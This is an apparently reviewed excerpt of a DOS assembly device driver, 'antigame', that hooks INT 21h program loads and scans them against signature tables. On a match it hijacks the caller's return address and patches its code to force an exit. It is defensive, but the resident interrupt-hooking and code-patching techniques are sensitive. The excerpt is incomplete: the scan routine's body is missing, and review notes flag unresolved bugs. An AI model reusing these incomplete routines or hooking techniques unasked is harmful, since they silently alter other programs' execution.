📄 antig.asm
; 16-bit real-mode DOS code, MASM syntax. The image starts at offset 0 with a
; DOS device-driver header, followed by the resident data used by the
; INT 21h hook further down.
.286
.model small
include push.mac
.code
; Code and data share one segment; the handlers below still address these
; variables with explicit cs: overrides because DS belongs to the caller
; while an interrupt is being serviced.
assume cs:_TEXT,ds:_TEXT
org 000h
; --- device-driver header: link, attribute, two entry offsets, 8-byte name ---
next_dev dd 0FFFFFFFFh ; link to the next driver; -1 = none
devatt dw 8000h ; attribute word, bit 15 set = character device
dw offset strategy ; strategy entry (label not visible in this excerpt)
dw offset interrupt ; interrupt entry (label not visible in this excerpt)
nam db 'antigame' ; device name, exactly 8 bytes
; NOTE(review): no matching `endp` for this proc is visible in this excerpt.
start proc far
; --- resident variables ---
old_si dw 0 ; not referenced in the visible code
old_bx dw 0 ; BX saved on entry to the EXEC path and to int_4b_scan
old_cx dw 0 ; not referenced in the visible code
old_dx dw 0 ; DX saved by int_4b_scan
es_main dw 0 ; not referenced in the visible code
num_ff dw 0 ; high word of the file size (number of 64K blocks)
last_pag dw 0 ; low word of the file size (bytes in the last block)
viroff dw 0 ; offset of the signature table selected for the current file
cnt db 0 ; 0 until the first EXEC has been seen, then 1
count db 0 ; number of table entries to scan; 0 for a file name found in `buffer`
scan_seg dw 0 ; segment handed to scanvir for an overlay load
mes db 'Found !','$' ; '$'-terminated for INT 21h AH=09h
filnm db 15 dup(0) ; copy of the last executed file name (15 bytes, no terminator stored)
; Table of file names that are not scanned: the INT 21h hook compares slots
; 0..4, each 15 bytes wide. Slot 0 is 'NCMAIN.EXE' padded with zeros; slot 1
; starts with 'QA.COM' and is padded by the zero fill that follows.
buffer db 'NCMAIN.EXE',0h,0h,0h,0h,0h
; NOTE(review): the trailing comma on the next line may be rejected or
; treated as a line continuation, depending on the assembler - confirm.
db 'QA.COM',
db 64 dup (0)
; presumably defines only_exe, com_exe, ov_pi and their *_count bytes, which
; the hook references - the file is not visible here
include datagame.inc
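;-----------------------------------------------------------------------
; int_21h_entry - resident INT 21h hook (16-bit real mode, MASM syntax)
;
; Every request except AH=4Bh (EXEC) is chained untouched to the previous
; handler through the far jump whose operand is old_21h_off:old_21h_seg
; (filled in outside this excerpt).
;
; For EXEC (DS:DX = ASCIIZ program path, ES:BX = parameter block):
;   1. the first EXEC after installation is only counted (cnt) and chained;
;   2. the file-name part of the path is compared with the 15-byte slots
;      of `buffer`; an exact match sets count = 0;
;   3. otherwise the name is copied to `filnm`, a table is chosen by
;      extension (only_exe / com_exe / ov_pi, defined outside this excerpt)
;      and the file size is stored in num_ff:last_pag;
;   4. for AL <> 0 the caller's return address is replaced with fal_ovl,
;      so fal_ovl runs after DOS has completed the load.
;
; In:    AH = function, plus the registers of that function
; Out:   all registers and flags as on entry when the request is chained
; State: cnt, old_bx, filnm, viroff, count, num_ff, last_pag, scan_seg,
;        old_ovl_off/old_ovl_seg are single global slots - not reentrant.
;
; Hardening relative to the original listing (the path is caller-supplied):
;   - CLD before the string instructions; DF is the caller's on entry.
;   - The backward search for '\' stops at the start of the path, so a
;     path without a backslash no longer reads below DS:DX.
;   - The copy into the 15-byte `filnm` is clamped to 15 bytes.
;   - A `buffer` slot must end where the name ends; a name that is only a
;     prefix of a slot is no longer exempted from scanning.
;   - An empty path is recognised (the first byte is tested too).
;-----------------------------------------------------------------------
int_21h_entry:
        pushf                           ; Push flags
        sti                             ; Enable interrupts
        cmp     ah,4Bh                  ; EXEC request?
        je      loc_25                  ; Jump if equal
loc_24:
        popf                            ; Pop flags
        db      0EAh                    ; opcode of JMP FAR ptr16:16, operand follows
old_21h_off dw ?
old_21h_seg dw ?
loc_25:
        cmp     cs:cnt, 0
        jne     loc_204
        inc     cs:cnt                  ; first EXEC: count it and pass it through
        jmp     loc_24
loc_204:
        mov     cs:old_bx,bx            ; BX is used as scratch below
        push    ax
        push    cx
        push    di
        push    es
        push    ds
        push    si
        push    dx
        cld                             ; string ops must run forward; flags are restored by popf
        mov     si,dx
        dec     si                      ; so that the first byte of the path is tested as well
loc_205:
        inc     si
        cmp     byte ptr ds:[si],0
        jne     loc_205                 ; si -> terminating NUL of the path
        mov     bh,0                    ; bh = length of the file-name part
        ; NOTE(review): bh is 8 bits wide, so a component longer than 255
        ; bytes wraps the counter; the copy below is clamped regardless.
loc_206:
        cmp     si,dx                   ; reached the start of the path?
        je      loc_name_ok             ; yes: no '\' present, whole path is the name
        inc     bh
        dec     si
        cmp     byte ptr ds:[si],'\'
        jne     loc_206
        inc     si                      ; step back over the '\'
        dec     bh                      ; ...and do not count it
loc_name_ok:
        push    cs
        pop     es                      ; es:di will address buffer / filnm
        xor     cx,cx
        mov     bl,-1                   ; bl = slot index, pre-incremented below
loc_94:
        inc     bl
        lea     di,cs:buffer
        mov     ax,15                   ; slot width
        mul     bl                      ; ax = 15 * slot index (8-bit mul, DX untouched)
        add     di,ax
        push    si
        mov     cl,bh                   ; ch is 0 here, so cx = name length
        rep     cmpsb
        jne     loc_no_match
        cmp     byte ptr es:[di],0      ; the slot must end where the name ends
loc_no_match:
        pop     si                      ; pop leaves ZF from the compare intact
        je      loc_57
        cmp     bl,4                    ; slots 0..4 are checked
        jne     loc_94
        jmp     short loc_95
loc_57:
        mov     byte ptr cs:count,0     ; listed file: nothing to scan
        jmp     loc_fin
loc_95:
        mov     cl,bh
        cmp     cl,15                   ; filnm is 15 bytes long
        jbe     loc_copy_nm
        mov     cl,15                   ; clamp: never write past filnm
loc_copy_nm:
        mov     al,bh
        sub     al,cl
        xor     ah,ah                   ; ax = bytes of the name left uncopied
        lea     di,cs:filnm
        rep     movsb
        add     si,ax                   ; si -> NUL after the name, as before the clamp
        sub     si,3                    ; si -> last three characters (the extension)
        cmp     word ptr ds:[si],'XE'   ; bytes 'E','X' in memory: .EXE
        jne     loc_47
        lea     ax,cs:only_exe
        mov     byte ptr bl,cs:only_exe_count
        jmp     short loc_files
loc_47:
        cmp     word ptr ds:[si],'OC'   ; bytes 'C','O' in memory: .COM
        je      loc_79
        lea     ax,cs:ov_pi             ; any other extension
        mov     byte ptr bl,cs:ov_pi_count
        jmp     short loc_files
loc_79:
        lea     ax,cs:com_exe
        mov     byte ptr bl,cs:com_exe_count
loc_files:
        mov     cs:viroff,ax
        mov     byte ptr cs:count,bl
        ; The nested INT 21h calls below re-enter this hook with AH <> 4Bh
        ; and are chained straight through.
        mov     ah,3dh
        xor     al,al
        int     21h                     ; file is open for reading
        ; NOTE(review): on failure num_ff/last_pag keep the values of the
        ; previous file while count is already set - confirm scanvir copes.
        jc      loc_fin
        mov     bx,ax                   ; bx = file handle
        mov     ah,42h
        xor     cx,cx
        mov     dx,cx
        mov     al,2
        int     21h                     ; seek to the end
        mov     cs:num_ff,dx            ; save number of 64k
        mov     cs:last_pag,ax          ; save length of last page
        mov     ah,3eh
        int     21h                     ; close the file
loc_fin:
        pop     dx
        pop     si
        pop     ds
        pop     es
        pop     di
        pop     cx
        pop     ax
        cmp     al,0                    ; AL = 0: load and execute, no return hook
        jne     lc_en
        jmp     short loc_en
lc_en:
        ; NOTE(review): the first word of the parameter block is the load
        ; segment only for AL=03h (load overlay); for other non-zero
        ; subfunctions it has a different meaning - confirm the intent.
        mov     bx,cs:old_bx
        mov     word ptr bx,es:[bx]     ; first word of the EXEC parameter block
        mov     word ptr cs:scan_seg,bx
        ; Stack here (top first): our flags, caller IP, caller CS, caller flags.
        popf
        pop     cs:old_ovl_off          ; remember where the caller wanted to return
        pop     cs:old_ovl_seg
        push    cs                      ; DOS will now return to cs:fal_ovl instead
        push    offset cs:fal_ovl
        pushf                           ; consumed by the popf at loc_24
loc_en:
        mov     bx,cs:old_bx
        jmp     loc_24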
; fal_ovl - reached in place of the caller's own return address after an
; EXEC with AL <> 0; the INT 21h hook stores that address in
; old_ovl_off:old_ovl_seg and substitutes this label.
; Scans the segment saved in scan_seg. If scanvir reports a match (CF set),
; a message is printed and the two bytes at the caller's return address are
; overwritten with CDh 21h (`int 21h`); AH is set to 4Ch, so the caller
; terminates as soon as control returns to it. Otherwise control returns to
; the caller unchanged.
; NOTE(review): only flags, ES, DS and AX are saved here; BX, DX, SI, DI and
; BP are not, although scanvir's header lists several registers -
; presumably as clobbers. Confirm callers do not depend on them.
; NOTE(review): the patched bytes are not restored anywhere in the visible
; code, and AL (the exit code) is whatever DOS returned from EXEC.
fal_ovl:
pushf
push es
push ds
push ax
mov dx,cs:scan_seg ; dx = segment to scan (scanvir input)
push cs
pop ds ; ds = this segment, where the signature table lives
call scanvir
pop ax ; pop does not change CF, which still holds scanvir's result
jnc loc_nvi ; nothing found: return to the caller untouched
call message ; prints the name at ds:si, then 'Found !'
mov di,cs:old_ovl_seg
mov es,di
mov di,cs:old_ovl_off ; es:di = caller's return address
mov es:[di],21cdh ; stored low byte first: CDh 21h = `int 21h`
mov ah,4ch ; DOS "terminate process" for the patched instruction
loc_nvi:
pop ds
pop es
popf
db 0EAh ; opcode of JMP FAR ptr16:16; the operand is the saved return address
old_ovl_off dw ?
old_ovl_seg dw ?
;-----------------------------------------------------------------------
; message - print the string at DS:SI followed by the 'Found !' text
; In:    ds:si -> '$'-terminated string (the caller passes what scanvir
;        left there); ds must address this segment so that `mes` resolves
; Out:   nothing
; Clobb: ax, dx
; NOTE(review): INT 21h AH=09h prints up to the first '$'; this relies on
; every name being '$'-terminated - confirm in the signature table.
;-----------------------------------------------------------------------
message:
        mov     ah,09h                  ; DOS: print '$'-terminated string
        mov     dx,si                   ; first string: the name at ds:si
        int     21h
        mov     dx,offset mes           ; second string: 'Found !'
        mov     ah,09h
        int     21h
        ret
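;-----------------------------------------------------------------------
; int_4b_scan - far-callable stub; the scan it once performed is
; commented out. As it stands it saves BX and DX, returns the saved BX in
; AX, loads DS and ES from the saved DX and returns far with the caller's
; flags.
;
; Fix: old_bx / old_dx are now addressed through CS, like everywhere else
; in this file. The original used the assembler's default DS although the
; `push cs / pop ds` that would have set DS up is commented out, so the
; accesses went to whatever segment the caller had in DS (and, in loc_vir,
; to the DS just popped from the stack).
;
; In:    bx, dx - caller values
; Out:   ax = bx on entry, ds = es = dx on entry, flags preserved
; NOTE(review): no caller of int_4b_scan and no jump to loc_vir is visible
; in this excerpt; loc_vir discards two stack words, pops DS and then
; far-returns to old_dx:0000.
;-----------------------------------------------------------------------
int_4b_scan:
        pushf
        mov     cs:old_bx,bx
        mov     cs:old_dx,dx
; push cs
; pop ds
; add dx,10h ; dx = Start seg
; call scanvir
; jc loc_vir
        mov     ax,cs:old_bx
        mov     dx,cs:old_dx
        mov     ds,dx
        mov     es,dx
        popf
        retf
loc_vir:
; call message
        pop     dx                      ; discard two words from the stack
        pop     dx
        pop     ds
        mov     dx,cs:old_dx
        push    dx                      ; far-return target: old_dx:0000
        xor     dx,dx
        push    dx
        retf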
scanvir:
; dx = segment for scan (offset = 0)
; cs:viroff = offset of virtable
; ds = segment of virtable
; cs:count = number of viruses
; cs:num_ff = number of 64k
; cs:last_pag = number of bytes in last page
; return bit c if virus is founded
; ds:si points to the viruses name
; bp,es,di,bx,ax,dx